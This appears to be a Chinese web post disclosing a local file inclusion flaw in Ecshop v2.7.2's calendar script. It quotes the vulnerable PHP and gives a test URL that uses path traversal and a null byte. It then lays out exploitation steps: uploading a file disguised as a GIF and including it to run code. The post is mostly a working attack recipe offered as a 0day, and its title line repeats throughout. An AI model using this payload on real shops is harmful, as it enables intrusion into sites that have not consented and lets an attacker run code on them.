Ecshop 最新版(v272) 本地包含漏洞 Oday

2016-07-07 16:48 来源:www.chinab4c.com 作者:ecshop专家

“js/calendar.php”:

Ecshop 最新版(v272) 本地包含漏洞 Oday
$lang = (!empty($_GET['lang']))
? trim($_GET['lang']) : 'zh_cn';//没有过滤,很明显的包含漏洞 by: ℡Mr.LP

Ecshop 最新版(v272) 本地包含漏洞 Oday
if (!file_exists('../languages/' . $lang . '/calendar.php'))
{
$lang = 'zh_cn';
}

Ecshop 最新版(v272) 本地包含漏洞 Oday
require(dirname(dirname(__FILE__)) . '/data/config.php');
header('Content-type: application/x-javascript; charset=' . EC_CHARSET);

Ecshop 最新版(v272) 本地包含漏洞 Oday
include_once('../languages/' . $lang . '/calendar.php');//这里包含,需要截断 by: ℡Mr.

Ecshop 最新版(v272) 本地包含漏洞 Oday


测试代码:

Ecshop 最新版(v272) 本地包含漏洞 Oday
//需要 magic_quotes_gpc = Off

/js/calendar.php?lang=../index.php%00.

Ecshop 最新版(v272) 本地包含漏洞 Oday
(注意后面有个“.”)

Ecshop 最新版(v272) 本地包含漏洞 Oday


利用:

Ecshop 最新版(v272) 本地包含漏洞 Oday
1、注册用户

2、然后上传GIF89a头的GIF文件欺骗,

3、然后包含,如:%00.

Ecshop 最新版(v272) 本地包含漏洞 Oday
(注意后面有个“.”)